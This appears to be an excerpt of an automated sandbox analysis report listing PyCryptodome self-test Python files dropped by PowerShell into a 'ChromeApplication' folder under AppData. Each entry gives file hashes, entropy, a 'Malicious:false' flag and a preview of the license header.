                                                                                                                                                                                                  SHA-512:6606475A2DA9826A83BCED8A37F2F5F31C2B31FB13A2736565D9702B33DC660E49FFAB844E7914A3E0BD1AE790BC4D3336471CB658C6708723C713FA10DF944A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_DES.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16317
                                                                                                                                                                                                  Entropy (8bit):4.972164250562502
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:HwdQHvGJ6ea9UaWpN8CioAMv6WvkIy36Yc4OB:HUeGJ6DBW/9AMvdIbI
                                                                                                                                                                                                  MD5:99CE82AB3012C74BC91F8E8B95427E25
                                                                                                                                                                                                  SHA1:1B092CD7DECEF875899FE7B53B62C5533652335D
                                                                                                                                                                                                  SHA-256:2FF59AB811C58999DA679B0D9F25D666EBAE2FF1F1745A1044FC3DBD0E303A4F
                                                                                                                                                                                                  SHA-512:B69CA5C84B5DD23175EB96A498298A16A576E0806FDCDBBC05EB85217C8472453D674D06411F16625E32BBB84AB391353AF8EFED6D45C3A5E9ADE02970ADBC3D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES.py: Self-test for the (Single) DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_DES3.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6756
                                                                                                                                                                                                  Entropy (8bit):5.06266598549299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vqwfFQHvoI13aHDjuAyiBvhvmRzhHY4loq4lo03ufufunslOi:ywdQHvJAyE87eOi
                                                                                                                                                                                                  MD5:23C5203726EDB0F1187847B33A8100E4
                                                                                                                                                                                                  SHA1:CE17C2044B3C699B97758EA1F3B2865A30F4EF2A
                                                                                                                                                                                                  SHA-256:1B98BD98C3D586FF6C16A0C281C5E16AE56F6E6B1D2742CB82D071CF6F54AFAA
                                                                                                                                                                                                  SHA-512:A589F23C35E9B0B1FCCC0D04247213018A2F6BB0F4D21303833ACDA41FC148BF884E20BCF882F0547FE99EE7F2079BA89EF7298FE822F0262E5D924072C1179E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES3.py: Self-test for the Triple-DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_EAX.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29594
                                                                                                                                                                                                  Entropy (8bit):4.957692526089376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqihhfkZA0feFGMQcne3MKLLr9B6ES4HCkh9uVg1444W06mD3GL6ppWXP:Hr6qEk/vtS4VyOk2VX3DX
                                                                                                                                                                                                  MD5:3D9F3EE8F186BE39CD8BD11A32546DB9
                                                                                                                                                                                                  SHA1:B925778DB3FDED551EAB7C8D2BDC70566E1A8FF5
                                                                                                                                                                                                  SHA-256:DBC39CEA208C0A3D8963C29360393E485FEDB9A8F66C0A9CAD285014C96FDF58
                                                                                                                                                                                                  SHA-512:38630AF0D2242F8425375F6E87FE5C1F81BF71FC74F2EF8CC6BF245E4B3E61D47D9A260960C2303B87740424E330DDB27858B4670E07944C3F615C92B700643A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_GCM.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38227
                                                                                                                                                                                                  Entropy (8bit):4.989191313246231
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqvamL+F78Lz12BKOsc2zJjd+6neiVzoHG7hi6oaaaNH8z5kwIgX8As3N:Hr6qRLLRWiV0/vC9Q7pTmYXoX3h
                                                                                                                                                                                                  MD5:63DEBE7801411BF7CE24C24D875307ED
                                                                                                                                                                                                  SHA1:DC67FA052453B85A8A6B1E7C4DA386F821534E13
                                                                                                                                                                                                  SHA-256:FBD00F487173D330C461DC53F14CB971BDC708630515BF343864F83A7DD98C1A
                                                                                                                                                                                                  SHA-512:B98888E159F2E530A90C07D0146FC95019B667C1C8B1836FFCD66F2D403D65D26143E171FE5F822113FC3508D0BC1A108D49C9F79D14A036685E921FEE6BF0A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_OCB.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33484
                                                                                                                                                                                                  Entropy (8bit):4.976278818343072
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:0r6q/tlygjylMmWp3r3Cdx3fznY89OWdtKjdw:0rp/SgjCMp3r3Cd57Y897dtKjdw
                                                                                                                                                                                                  MD5:3CB37B2EE0C4CF45377BEB9DA08640F7
                                                                                                                                                                                                  SHA1:2723FA871E7A5FAA48B95344D262EC8181B26D99
                                                                                                                                                                                                  SHA-256:05D877E5930EE6784FD584014DC9F96F5022B788B18902907CF8283153FA252D
                                                                                                                                                                                                  SHA-512:D7CE67901EE4DC0374EE449D2E0F97D2A6BC8B3E3A7042AE914E6F631D6CF136E5C5CEFC627C42514EB6F6BDED066BB777080019036D38EF2BB0B62DED88AB5F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_OFB.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9605
                                                                                                                                                                                                  Entropy (8bit):5.31125213354927
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:M7DqrYJALrYJHdt3EHGuI4EsHg/pwJBcgIUOU9F3T6D+iDH978H3WpP9foEQTHSM:4qrskrs9t3q/IOOe3T6DF55xm+MQOp
                                                                                                                                                                                                  MD5:69D45753BA108E314F2EC3139D23F1AB
                                                                                                                                                                                                  SHA1:F4A946A36A10D898F0363CB435E5E2D5B3A82AA3
                                                                                                                                                                                                  SHA-256:D6E8220E8F383C767A2EAC33A812B5B63962A7BAE8ED083C72EA32EB39440BC2
                                                                                                                                                                                                  SHA-512:5D00264AB5B0CB21D1BB75FB5A046D545EB58EDE1B7C1E251A1D023BE2F6DBBDFCF9B8557DAB0DFD5704B876E1E96B34F97D1BD1A5224598761088114191D1AB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_OpenPGP.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8695
                                                                                                                                                                                                  Entropy (8bit):5.233149864619367
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I9mdYbJgNZN1U+KrYK4EZjpcURPSxI3JWcJj7cBEsOp:Hrskrs9VqbdYbJgNZN1U+KrYK4EZjpcE
                                                                                                                                                                                                  MD5:F0B2D0E39D7957BD5486A415E9979E34
                                                                                                                                                                                                  SHA1:36FD6B0A542857E099084680148FFC5732F3246B
                                                                                                                                                                                                  SHA-256:4AB75E51F66DD9C80B9B893C7EB35EEE23D93E14A6368099337987E3692D1B2B
                                                                                                                                                                                                  SHA-512:30414BECFFD622EA003C416A865CC5CEDA0BEB8C28462D1499D170818E4B91AF5E42377CBECE3D344920632CB250502B6E1921833D263805AB7FACED31774150
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_SIV.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20491
                                                                                                                                                                                                  Entropy (8bit):5.006612959191385
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqVTh5VGxNepuQTs5Tv/NoEeLi4WCImQhpHHa7DZhptMa+HRReeo8he/O:Hr6qCUDEUlJI1J4s
                                                                                                                                                                                                  MD5:24B5612D20DECB36BBA91195B3D38B6C
                                                                                                                                                                                                  SHA1:AFC72B63DF008E0175F1A3DBDBCABAE4A9AC4323
                                                                                                                                                                                                  SHA-256:AC2B287F231294E23E8037A25773BD7A67A54A72AB1FD6FD4D2652244E985D9A
                                                                                                                                                                                                  SHA-512:7989BAB6E0A17F65895E8E8966FBE9997B53DD07820E9FE3DF79C6D618E03CF9B296F46387949904F00A65FDA6292D8F59F84B1680840E069415F004521FC0BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_Salsa20.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16958
                                                                                                                                                                                                  Entropy (8bit):5.160995992543063
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:EQHvhR8hott4ZbmisW8uIeXpF+yca4etqp809eGTEQ4Mn+RBHTe/rjkbTwELKQHJ:EehuhQQsvusyv4etPaT5+WkbTxejsf
                                                                                                                                                                                                  MD5:20A190205D607A6AA44E8DC20A17310C
                                                                                                                                                                                                  SHA1:265351009BC9D8E1E39EB5F62F0A52C7B560BBB0
                                                                                                                                                                                                  SHA-256:F99CC569B39F3163A2025A128A4323E3454BC32473624627920287EC0DBB667E
                                                                                                                                                                                                  SHA-512:E8092EAC3CAB508AED453204CAA382B5FAD940425DE158106E0F738101A5E1C5326CE3402D3090E932C3DB156355DA61CEB3B7E52B358B8AF42FD5BE7C26006E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/Salsa20.py: Self-test for the Salsa20 stream cipher..#..# Written in 2013 by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_pkcs1_15.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11227
                                                                                                                                                                                                  Entropy (8bit):4.882703342503383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JQHv4y5ktlkZr+K2XLEGTOqZoS/O/M+pOS:JeVGmpOgGiq+S27F
                                                                                                                                                                                                  MD5:7B5B7AFA67531ACD4B7753B49FCE8CAB
                                                                                                                                                                                                  SHA1:1D6933BB1C12E3140C30BA4C4B7E5A10BA687900
                                                                                                                                                                                                  SHA-256:A33F4341D43D86CE8F8C87F2BCCC5DE1300CA223E2A53279B20348886C17F0C7
                                                                                                                                                                                                  SHA-512:15EE4D1DDBC6AF819FE33602CCF7E31DA34F15B7CF580DE0AEBF925511477D39D01C003FA2B630360FFBC724855EC555942311A6A08829E3A6581B0557EFBAE9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_15.py: Self-test for PKCS#1 v1.5 encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_pkcs1_oaep.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22796
                                                                                                                                                                                                  Entropy (8bit):4.426757156222012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jebGB32D5suEeAnSI9lA3tsxE3WtahvrAhMxHM7jI/+Il:SK2DOuxA/v2t+MhKM7mIl
                                                                                                                                                                                                  MD5:473FEB7F8AE236A1D02B3A61AE7B5514
                                                                                                                                                                                                  SHA1:9B1A0F819C8511085A16B8D50A337B52A6367713
                                                                                                                                                                                                  SHA-256:22DA3EC31421A2552198EF2AE00E6019DF85CBEAC74D428A50DF9CD6AB7210CA
                                                                                                                                                                                                  SHA-512:2377F27C15BD33D2BC9EA87C706B9BD981623B1394CDDBE49F2E8A76B6167C00128A476774B1FBADF5D17DBF95E160DF661FDBB110A2A6E3B4652DDC3E06D2BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_oaep.py: Self-test for PKCS#1 OAEP encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                  Entropy (8bit):5.141658250590196
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NtwwEIB0jcQHMsvI/S3oCFCqD0sISG+CMAE+dNg+o2+HX+Lj+EqkIt08k42iNTZI:wwfFQHvoUgd7oXHuL6EsLN1m9mArB
                                                                                                                                                                                                  MD5:89BDBFC47A5DCA90A45F4EF652DD7101
                                                                                                                                                                                                  SHA1:A9C8FFA344033B3EC5B43A5DAA3DA64EEAEB704E
                                                                                                                                                                                                  SHA-256:62225A7DF06D003A465C3BA5612F695BADB31559152C1492354B5C44A0A63BB5
                                                                                                                                                                                                  SHA-512:C665CDC1CA849D15EDA7AB0D9E26E4DCE1CF76CDCD4CD5E942691BD9017994EB39787828CB3131AD41ED90C1887FF856D68B2FA0DD2B14F74724A0A1E59F8342
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/__init__.py: Self-test for hash modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH TH

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\common.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10168
                                                                                                                                                                                                  Entropy (8bit):4.841216501855338
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ywdQHvXNIIqigCKOstqEZQY20Pe38Iy0yhFTolQycPIFZiU:yUeXNTY20238Iy0yhO+yB
                                                                                                                                                                                                  MD5:84B9FB90649EE10FEC0136B69073C4C1
                                                                                                                                                                                                  SHA1:8F804BA750722F19CCAC8B22915563FB3EDB0A85
                                                                                                                                                                                                  SHA-256:6AA885ED7E71F39C2197E822A1867B806660F4CBF4FC8E8197C3A0ED492272F4
                                                                                                                                                                                                  SHA-512:78B2A90CF9AF1E7CAEFC7BC83B9B18089013AAE849DC7D8E00B86E1BF5D399869B98D14362429D5C9576D3BD577914AE164B71E2E6489F6A8EDF40B8312B39D8
                                                                                                                                                                                                  Malicious:false
